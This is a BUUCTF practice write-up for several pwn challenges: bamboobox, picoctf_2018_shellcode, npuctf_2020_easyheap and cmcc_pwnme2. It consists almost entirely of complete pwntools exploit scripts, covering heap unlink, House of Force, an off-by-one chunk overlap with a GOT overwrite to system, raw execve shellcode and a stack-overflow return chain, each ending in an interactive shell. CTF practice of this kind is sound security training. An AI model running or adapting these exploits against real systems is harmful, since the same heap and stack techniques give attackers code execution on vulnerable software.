PWN-PRACTICE-BUUCTF-19

hitcontraining_bamboobox

unlink,参考:hitcontraining_bamboobox 堆技巧 unlink

# -*- coding:utf-8 -*-
from pwn import *
#io=process("./bamboobox")
# Connection to the target: the remote BUUCTF endpoint is used here; the
# commented process() line above is the local-debug alternative.
io=remote("node4.buuoj.cn",29339)
# ELF objects provide the symbol/GOT lookups used below (elf.got["atoi"],
# libc.sym["atoi"], libc.sym["system"]). The libc file name pins this script
# to the glibc 2.23 build it was written against; other builds change the offsets.
elf=ELF("./bamboobox")
libc=ELF("./libc-2.23-16-x64.so")

def show():
	"""Pick menu option 1 (list items); the caller reads the reply itself."""
	menu_prompt = "Your choice:"
	io.sendlineafter(menu_prompt, "1")
def add(name_len,name):
	"""Pick menu option 2 (add item) and answer its two prompts in order.

	name_len goes through str() for the length prompt; name is sent as given.
	"""
	dialogue = (
		("Your choice:", "2"),
		("the length of item name:", str(name_len)),
		("the name of item:", name),
	)
	for prompt, reply in dialogue:
		io.sendlineafter(prompt, reply)
def edit(index,name_len,name):
	"""Pick menu option 3 (edit item) and answer index, length and new name.

	index and name_len are sent as decimal text; name is sent as given, so the
	caller decides how many bytes actually follow the declared length.
	"""
	dialogue = (
		("Your choice:", "3"),
		("the index of item:", str(index)),
		("the length of item name:", str(name_len)),
		("the new name of the item:", name),
	)
	for prompt, reply in dialogue:
		io.sendlineafter(prompt, reply)
def free(index):
	"""Pick menu option 4 (remove item) for the item at the given index."""
	index_text = str(index)
	io.sendlineafter("Your choice:", "4")
	io.sendlineafter("the index of item:", index_text)
def exit():
	"""Pick menu option 5 (quit). Note: shadows the builtin exit() in this module."""
	choice = "5"
	io.sendlineafter("Your choice:", choice)

#gdb.attach(io)
#pause()

# Three items; the 0x40/0x80/0x80 sizes are what the payload sizes below assume.
add(0x40,"aaaa")
add(0x80,"bbbb")
add(0x80,"cccc")

#pause()

# Hard-coded address inside the non-PIE binary (presumably the item table —
# not shown on the page, confirm against ./bamboobox). fd/bk are placed
# 0x18/0x10 below it, the layout the "unlink" heading refers to.
ptr=0x00000000006020C8
fd=ptr-0x18
bk=ptr-0x10
# Fake chunk header (prev_size, size, fd, bk), padded to 0x40, then the
# prev_size/size fields for the following chunk.
# NOTE(review): "A" and "\x00" are str while p64() returns bytes — this only
# runs under Python 2 pwntools; Python 3 would need b"..." literals here and below.
payload=p64(0)+p64(0x40)+p64(fd)+p64(bk)
payload=payload.ljust(0x40,"A")
payload+=p64(0x40)+p64(0x90)
# edit() declares len(payload) (0x50) as the length, more than the 0x40
# requested for item 0 above.
edit(0,len(payload),payload)

#pause()

free(1)

#pause()

# Item 0 is rewritten again; the last qword is the GOT entry of atoi, so a
# later show() prints the contents of that entry.
atoi_got=elf.got["atoi"]
payload=p64(0)*2+p64(0x40)+p64(atoi_got)
edit(0,len(payload),payload)

#pause()

show()
io.recvuntil("0 : ")
# Six raw bytes of a 64-bit address, zero-padded to eight before unpacking.
atoi_addr=u64(io.recv(6).ljust(8,"\x00"))
print("atoi_addr=="+hex(atoi_addr))
# Offsets come from the libc build loaded at the top; a different build breaks this.
libc_base=atoi_addr-libc.sym["atoi"]
system=libc_base+libc.sym["system"]

#pause()

# Overwrite the same 8-byte slot with system's address.
edit(0,0x08,p64(system))

#pause()

# Presumably the menu parses its choice with atoi, which is why that GOT slot
# was chosen; this input is then handed to system.
io.sendlineafter("Your choice:","/bin/sh\x00")

io.interactive()

House of Force,参考:hitcontraining_bamboobox 堆技巧 House of Force

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
# Local run via process(); the commented remote() line is the BUUCTF endpoint
# (note it uses a different port than the unlink script above).
io=process("./bamboobox")
#io=remote("node4.buuoj.cn",26168)
elf=ELF("./bamboobox")
# Loaded but never referenced in this script — no libc leak is needed here.
libc=ELF("./libc-2.23-16-x64.so")

def show():
	"""Send menu option 1 (list items)."""
	reply = "1"
	io.sendlineafter("Your choice:", reply)
def add(name_len,name):
	"""Send menu option 2 (add item), then the length and the name.

	The length is sent as decimal text (negative values included, str() does
	not validate); the name is sent unchanged.
	"""
	steps = [
		("Your choice:", "2"),
		("the length of item name:", str(name_len)),
		("the name of item:", name),
	]
	for prompt, reply in steps:
		io.sendlineafter(prompt, reply)
def edit(index,name_len,name):
	"""Send menu option 3 (edit item) followed by index, length and new name."""
	steps = [
		("Your choice:", "3"),
		("the index of item:", str(index)),
		("the length of item name:", str(name_len)),
		("the new name of the item:", name),
	]
	for prompt, reply in steps:
		io.sendlineafter(prompt, reply)
def free(index):
	"""Send menu option 4 (remove item) for the given index."""
	steps = [("Your choice:", "4"), ("the index of item:", str(index))]
	for prompt, reply in steps:
		io.sendlineafter(prompt, reply)
def exit():
	"""Send menu option 5 (quit). This shadows the builtin exit(); the call
	near the end of the script hits this helper, not the interpreter's."""
	reply = "5"
	io.sendlineafter("Your choice:", reply)

#gdb.attach(io)
#pause()

add(0x30,"aaaa")
# 0x30 bytes of filler, then the following chunk's prev_size and a size of
# all-ones (0xffffffffffffffff).
# NOTE(review): str ("a"*0x30) concatenated with bytes (p64) — Python 2 only.
payload="a"*0x30+p64(0)+p64(0xffffffffffffffff)
edit(0,len(payload),payload)

#pause()

# Negative request: 0x000-0x060-0x10 = -0x70, sent through str() as "-112".
offset=0x000-0x060-0x10
add(offset,"bbbb")# move top chunk

#pause()

# Hard-coded address in ./bamboobox written twice; what lives at 0x400D49 is
# not shown on the page — confirm with a disassembler before reusing.
magic=0x0000000000400D49
add(0x10,p64(magic)*2)

#pause()

# Calls the menu helper exit() defined above (option 5), not the builtin.
exit()

#pause()

io.interactive()

picoctf_2018_shellcode

32位elf,静态编译,保护几乎全都没开
main函数中有条call eax的gadget,eax保存的是输入的起始地址,于是输入shellcode即可执行

from pwn import *
#io=process('./PicoCTF_2018_shellcode')
# Remote target; the process() line above is the local alternative.
io=remote('node4.buuoj.cn',27908)
# Loaded but not referenced afterwards in this script.
elf=ELF('PicoCTF_2018_shellcode')
io.recvuntil('Enter a string!\n')
# 32-bit shellcode assembled by pwntools (pwntools' default arch is i386,
# matching the 32-bit ELF the note above describes): it builds "//bin/sh" on
# the stack and issues int 0x80 with eax=0xb (execve). It is sent as the
# program's input, which the note says is reached through the call eax gadget.
shellcode=asm('xor ecx,ecx;xor edx,edx;push edx;push 0x68732f6e;push 0x69622f2f ;mov ebx,esp;mov eax,0xb;int 0x80')
io.sendline(shellcode)
io.interactive()

npuctf_2020_easyheap

obo,参考:npuctf_2020_easyheap

# -*- coding:utf-8 -*-
from pwn import *
#io=process("./npuctf_2020_easyheap")
# Remote BUUCTF endpoint; the process() line above is for local debugging.
io=remote("node4.buuoj.cn",25100)
# elf is used for elf.got["free"], libc for the free/system offsets below.
# The libc name pins this to a glibc 2.27 build.
elf=ELF("./npuctf_2020_easyheap")
libc=ELF("./libc-2.27-18-x64.so")

def add(size,content):
	"""Send menu option 1 (allocate), then the size and the content.

	The size prompt advertises "0x10 or 0x20 only" but str(size) forwards
	whatever the caller passes; content is sent unchanged.
	"""
	conversation = (
		("Your choice :", "1"),
		("Size of Heap(0x10 or 0x20 only) : ", str(size)),
		("Content:", content),
	)
	for prompt, reply in conversation:
		io.sendlineafter(prompt, reply)
def edit(index,content):
	"""Send menu option 2 (edit), then the decimal index and the new content."""
	conversation = (
		("Your choice :", "2"),
		("Index :", str(index)),
		("Content: ", content),
	)
	for prompt, reply in conversation:
		io.sendlineafter(prompt, reply)
def show(index):
	"""Send menu option 3 (show) for the given index; the caller parses the output."""
	index_text = str(index)
	io.sendlineafter("Your choice :", "3")
	io.sendlineafter("Index :", index_text)
def free(index):
	"""Send menu option 4 (delete) for the given index."""
	conversation = (("Your choice :", "4"), ("Index :", str(index)))
	for prompt, reply in conversation:
		io.sendlineafter(prompt, reply)
def exit():
	"""Send menu option 5 (quit). Shadows the builtin exit() within this module."""
	reply = "5"
	io.sendlineafter("Your choice :", reply)

#gdb.attach(io)
#pause()

# Three 0x18-byte items; item 2 holds the string handed to system at the end.
add(0x18,"aaaa")#0
add(0x18,"bbbb")#1
add(0x18,"/bin/sh\x00")#2

#pause()

# 0x18 bytes fill item 0's content; the qword after it (0x41) lands on the
# next chunk's size field — the "obo" (off-by-one) the heading refers to.
# NOTE(review): str ("a"*0x18) + bytes (p64) — runs under Python 2 only.
payload="a"*0x18+p64(0x41)
edit(0,payload)

#pause()

free(1)

#pause()

# 0x38 is outside the "0x10 or 0x20 only" range the add() prompt advertises.
# The payload lays down a forged record (size 8, pointer = free's GOT entry)
# where item 1's metadata presumably sits after the free above — not shown
# on the page, confirm in a debugger.
payload="a"*0x10+p64(0)+p64(0x21)+p64(8)+p64(elf.got["free"])
add(0x38,payload)

#pause()

show(1)
io.recvuntil("Content : ")
# recvuntil returns the trailing "\n"; drop it, zero-pad to 8 bytes, unpack.
free_addr=u64(io.recvuntil("\n")[:-1].ljust(8,"\x00"))
print("free_addr=="+hex(free_addr))
# Offsets depend on the libc-2.27 build loaded at the top.
libc_base=free_addr-libc.sym["free"]
system=libc_base+libc.sym["system"]
print("system=="+hex(system))

#pause()

# Item 1's pointer targets free's GOT slot, so this edit writes system there;
# freeing item 2 ("/bin/sh") then goes through that slot.
edit(1,p64(system))
free(2)

#pause()

io.interactive()

cmcc_pwnme2

栈溢出

from pwn import *
#io=process('./cmcc_pwnme2')
# Remote BUUCTF endpoint; the process() line above is the local alternative.
io=remote('node4.buuoj.cn',29405)
elf=ELF('./cmcc_pwnme2')
gets_plt=elf.plt['gets']
# Hard-coded addresses from this non-PIE 32-bit binary; what they are is not
# shown on the page (presumably a writable buffer and the routine that uses
# it) — confirm with a disassembler before reusing.
string_addr=0x0804A060
exec_str=0x080485CB
io.recvuntil('Please input:\n')
# 0x6c+4 bytes of filler (presumably buffer plus saved ebp), then a 32-bit
# cdecl chain: return into gets, with exec_str as gets's return address and
# string_addr as its argument.
# NOTE(review): 'a'*... is str while p32() returns bytes — Python 2 only.
payload='a'*(0x6c+4)+p32(gets_plt)+p32(exec_str)+p32(string_addr)
io.sendline(payload)
# This second line is what gets() reads into string_addr.
io.sendline('./flag')
io.interactive()